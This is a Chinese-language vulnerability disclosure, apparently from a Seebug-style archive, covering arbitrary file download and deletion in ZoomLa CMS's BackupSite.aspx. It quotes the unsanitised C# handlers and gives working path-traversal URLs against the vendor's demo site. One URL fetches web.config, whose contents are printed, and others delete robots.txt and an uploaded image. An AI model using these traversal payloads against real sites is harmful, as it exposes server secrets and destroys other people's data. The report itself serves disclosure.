### 简要描述: 逐浪最新版 任意文件删除 任意文件下载 ### 详细说明: 在此请求逐浪cms 重视每个白帽子提交的漏洞 不要老是漏洞忽略 地址 ``` http://demo.zoomla.cn/USER/Develop%5CSiteAdmin/BackupSite.aspx ``` 源码如下 ``` protected void Page_Load(object sender, EventArgs e) { this.M_U = this.B_U.GetLogin(); if (base.Request.QueryString["status"] == "del") //任意文件删除 { this.del(base.Request.QueryString["name"].ToString()); } if (base.Request.QueryString["status"] == "down") //任意文件下载 { this.down(base.Request.QueryString["name"].ToString()); } this.GetBakFileList(); } ``` 我们先看下任意文件下载 ``` public void down(string name) { base.Response.Clear(); base.Response.ClearContent(); base.Response.ClearHeaders(); base.Response.AddHeader("Content-Transfer-Encoding", "binary"); base.Response.ContentType = "application/octet-stream"; base.Response.ContentEncoding = Encoding.GetEncoding("gb2312"); string filename = base.Server.MapPath("/Dev/bak/" + this.M_U.UserID.ToString() + "/" + name); //没处理 base.Response.WriteFile(filename); base.Response.Flush();...
### 简要描述: 逐浪最新版 任意文件删除 任意文件下载 ### 详细说明: 在此请求逐浪cms 重视每个白帽子提交的漏洞 不要老是漏洞忽略 地址 ``` http://demo.zoomla.cn/USER/Develop%5CSiteAdmin/BackupSite.aspx ``` 源码如下 ``` protected void Page_Load(object sender, EventArgs e) { this.M_U = this.B_U.GetLogin(); if (base.Request.QueryString["status"] == "del") //任意文件删除 { this.del(base.Request.QueryString["name"].ToString()); } if (base.Request.QueryString["status"] == "down") //任意文件下载 { this.down(base.Request.QueryString["name"].ToString()); } this.GetBakFileList(); } ``` 我们先看下任意文件下载 ``` public void down(string name) { base.Response.Clear(); base.Response.ClearContent(); base.Response.ClearHeaders(); base.Response.AddHeader("Content-Transfer-Encoding", "binary"); base.Response.ContentType = "application/octet-stream"; base.Response.ContentEncoding = Encoding.GetEncoding("gb2312"); string filename = base.Server.MapPath("/Dev/bak/" + this.M_U.UserID.ToString() + "/" + name); //没处理 base.Response.WriteFile(filename); base.Response.Flush(); base.Response.End(); } ``` 漏洞证明 访问 ``` demo.zoomla.cn/USER/Develop\SiteAdmin/BackupSite.aspx?status=down&name=../../../web.config ``` [<img src="https://images.seebug.org/upload/201408/061245346e104197756f87bcc0d72c2522f0f50b.png" alt="83.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/061245346e104197756f87bcc0d72c2522f0f50b.png) 打开文件查看内容 ``` <?xml version="1.0"?> <!-- 注意: 除了手动编辑此文件以外,您还可以使用 Web 管理工具来配置应用程序的设置。可以使用 Visual Studio 中的 “网站”->“Asp.Net 配置”选项。 设置和注释的完整列表在 machine.config.comments 中,该文件通常位于 \Windows\Microsoft.Net\Framework\v2.x\Config 中 --> <configuration> <configSections> <sectionGroup name="system.web"> <!--<section name="neatUpload" type="Brettle.Web.NeatUpload.ConfigSectionHandler, Brettle.Web.NeatUpload" allowLocation="true"/>--> </sectionGroup> <section name="RewriterConfig" type="URLRewriter.Config.RewriterConfigSerializerSectionHandler, URLRewriter"/> </configSections> <appSettings configSource="Config\AppSettings.config"/> <RewriterConfig configSource="Config\URLRewrite.config"/> <connectionStrings configSource="Config\ConnectionStrings.config"/> <system.web> <sessionState mode="InProc" stateConnectionString="tcpip=127.0.0.1:42424" sqlConnectionString="data source=127.0.0.1;Trusted_Connection=yes" cookieless="false" timeout="20"/> <!--<identity impersonate="true" userName="administrator" password="password" />--> <!--Ajax支持--> <httpHandlers> <add verb="*" path="*.flv" type="ZoomLa.NoLink"/> <!--<add verb="*" path="*.aspx" type="URLRewriter.RewriterFactoryHandler,URLRewriter"/>--> <!--经典模式使用--> <!--<add verb="*" path="Images/*.jpg" type="UploadHandler"/>--> </httpHandlers> <!--end--> <compilation debug="false" targetFramework="4.0"> <assemblies> <add assembly="Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/> <add assembly="System.Design, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/> <add assembly="System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/> <add assembly="Accessibility, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/> <add assembly="System.Data.OracleClient, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/> <add assembly="System.Messaging, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/> <add assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/> <add assembly="System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/> <add assembly="System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/> <add assembly="System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/> <add assembly="System.DirectoryServices.Protocols, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/> <add assembly="System.DirectoryServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/> </assemblies> </compilation> <!--<neatUpload useHttpModule="True" maxNormalRequestLength="1048576" maxRequestLength="2097151" defaultProvider="FilesystemUploadStorageProvider"> <httpRuntime requestValidationMode="2.0" maxRequestLength="512000" appRequestQueueLimit="1000" useFullyQualifiedRedirectUrl="true" executionTimeout="3600"/> <providers> <add name="FilesystemUploadStorageProvider" type="Brettle.Web.NeatUpload.FilesystemUploadStorageProvider, Brettle.Web.NeatUpload"/> </providers> </neatUpload>--> <!--通过 <authentication> 节可以配置 ASP.NET 使用的 安全身份验证模式,以标识传入的用户。--> <!-- 如果在执行请求的过程中出现未处理的错误,则通过 <customErrors> 节可以配置相应的处理步骤。 具体说来,开发人员通过该节可以配置要显示的 html 错误页以代替错误堆栈跟踪。RemoteOnly --> <customErrors mode="Off" defaultRedirect="~/Prompt/GenericError.htm"> <error statusCode="403" redirect="~/Prompt/NoAccess.htm"/> <error statusCode="404" redirect="~/Prompt/FileNotFound.htm"/> <error statusCode="500" redirect="~/Prompt/GenericError.htm"/> </customErrors> <!--添加、移除或清除应用程序中的 HTTP 模块。--> <httpModules> <!--<add name="UploadHttpModule" type="Brettle.Web.NeatUpload.UploadHttpModule, Brettle.Web.NeatUpload"/>--> <add name="IPModule" type="ZoomLa.Web.HttpModule.IPHttpModule, ZoomLa.Web"/> <!--<ADD NAME="MODULEREWRITER" TYPE="URLREWRITER.MODULEREWRITER, URLREWRITER"/>--> <!--<add name="StrConvHttpModule" type="ZoomLa.HttpModules.StrConvHttpModule, StrConvHttpModule"/>--> </httpModules> <!--<httpRuntime maxRequestLength="2097151" executionTimeout="3600" useFullyQualifiedRedirectUrl="true"/>--> <httpRuntime requestValidationMode="2.0" maxRequestLength="512000" appRequestQueueLimit="1000" useFullyQualifiedRedirectUrl="true" executionTimeout="3600"/> <pages configSource="Config\Pages.config"/> </system.web> <system.webServer> <validation validateIntegratedModeConfiguration="false"/> <modules runAllManagedModulesForAllRequests="true"> <!--<add name="StrConvHttpModule" type="ZoomLa.HttpModules.StrConvHttpModule, StrConvHttpModule"/>--> <add name="IPModule" type="ZoomLa.Web.HttpModule.IPHttpModule, ZoomLa.Web"/> </modules> <handlers> <add name="UrlHandles" path="*.aspx" verb="*" type="URLRewriter.RewriterFactoryHandler,URLRewriter" preCondition="integratedMode"/> <!--集成模式--> <add name="Zoomla" path="*.net" verb="*" modules="IsapiModule" scriptProcessor="C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_isapi.dll" resourceType="Unspecified" preCondition="classicMode,runtimeVersionv2.0,bitness32"/> </handlers> <defaultDocument> <files> <remove value="default.aspx"/> <add value="Default.aspx"/> </files> </defaultDocument> </system.webServer> </configuration> ``` 可下载其他内容的 接着我们看下任意文件删除 ``` protected void del(string name) { FileSystemObject.Delete(base.Server.MapPath("/Dev/bak/" + this.M_U.UserID.ToString() + "/" + name), FsoMethod.File); } ``` ``` public static void Delete(string file, FsoMethod method) { if ((method == FsoMethod.File) && File.Exists(file)) { File.Delete(file); } if ((method == FsoMethod.Folder) && Directory.Exists(file)) { Directory.Delete(file, true); } } ``` 漏洞证明 我还是本地进行测试好点 先访问 ``` http://demo.zoomla.cn/robots.txt ``` [<img src="https://images.seebug.org/upload/201408/06130122ebe13a5016122794f4a5209b738dc0c6.png" alt="84.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/06130122ebe13a5016122794f4a5209b738dc0c6.png) 文件是存在的 等下我访问 ``` http://demo.zoomla.cn/USER/Develop/SiteAdmin/BackupSite.aspx?status=del&name=../../../robots.txt ``` 在访问 ``` http://demo.zoomla.cn/robots.txt ``` [<img src="https://images.seebug.org/upload/201408/06130205657324f731d70cba3136903c19eb6e0a.png" alt="86.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/06130205657324f731d70cba3136903c19eb6e0a.png) 不在了 访问 ``` http://demo.zoomla.cn/UploadFiles/3D/200912/200912111913258191.jpg ``` [<img src="https://images.seebug.org/upload/201408/06130455badd4bb6e6304ccae09f363e3af57c06.png" alt="85.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/06130455badd4bb6e6304ccae09f363e3af57c06.png) 是存在的 然后访问 ``` http://demo.zoomla.cn/USER/Develop/SiteAdmin/BackupSite.aspx?status=del&name=../../../UploadFiles/3D/200912/200912111913258191.jpg ``` [<img src="https://images.seebug.org/upload/201408/061303423096cd74a0bdca1ee9829cac4191c819.png" alt="88.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/061303423096cd74a0bdca1ee9829cac4191c819.png) ### 漏洞证明: 漏洞证明如上
